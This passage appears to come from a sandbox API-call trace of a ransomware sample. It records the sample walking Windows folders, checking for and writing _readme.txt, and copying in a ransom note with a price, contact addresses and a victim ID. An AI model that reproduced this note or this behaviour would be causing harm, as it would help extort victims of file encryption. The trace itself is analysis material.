decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.872] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.872] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.872] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0xffffffff [0227.872] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda58 | out: hHeap=0x630000) returned 1 [0227.873] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.873] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.873] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.873] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7340 | out: hHeap=0x630000) returned 1 [0227.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b73d0 | out: hHeap=0x630000) returned 1 [0227.874] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.874] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda30 | out: hHeap=0x630000) returned 1 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.874] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.874] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.874] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.874] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.874] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.874] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.874] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.875] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.875] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.875] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.875] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.875] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.875] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.875] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.875] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.875] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.875] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.875] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.875] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.875] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.876] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.876] PathFindFileNameW (pszPath="") returned="" [0227.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda30 [0227.876] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.876] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.876] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0227.876] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.876] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.877] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.877] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.877] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7c319580, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x7c319580, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7340 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b73d0 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7460 [0227.877] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc48 [0227.877] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc80 [0227.877] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edc10 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edcb8 [0227.877] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9e0 [0227.877] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.877] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0227.878] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0227.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9e0 [0227.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31edb68 [0227.878] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0227.878] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.878] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31eda58 [0227.878] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed828 [0227.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.878] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.878] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.878] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0227.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.878] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.878] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.878] PathFindFileNameW (pszPath="") returned="" [0227.878] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.878] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.879] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.879] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a3390 [0227.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.879] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.879] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0227.879] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.880] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0227.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.880] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our 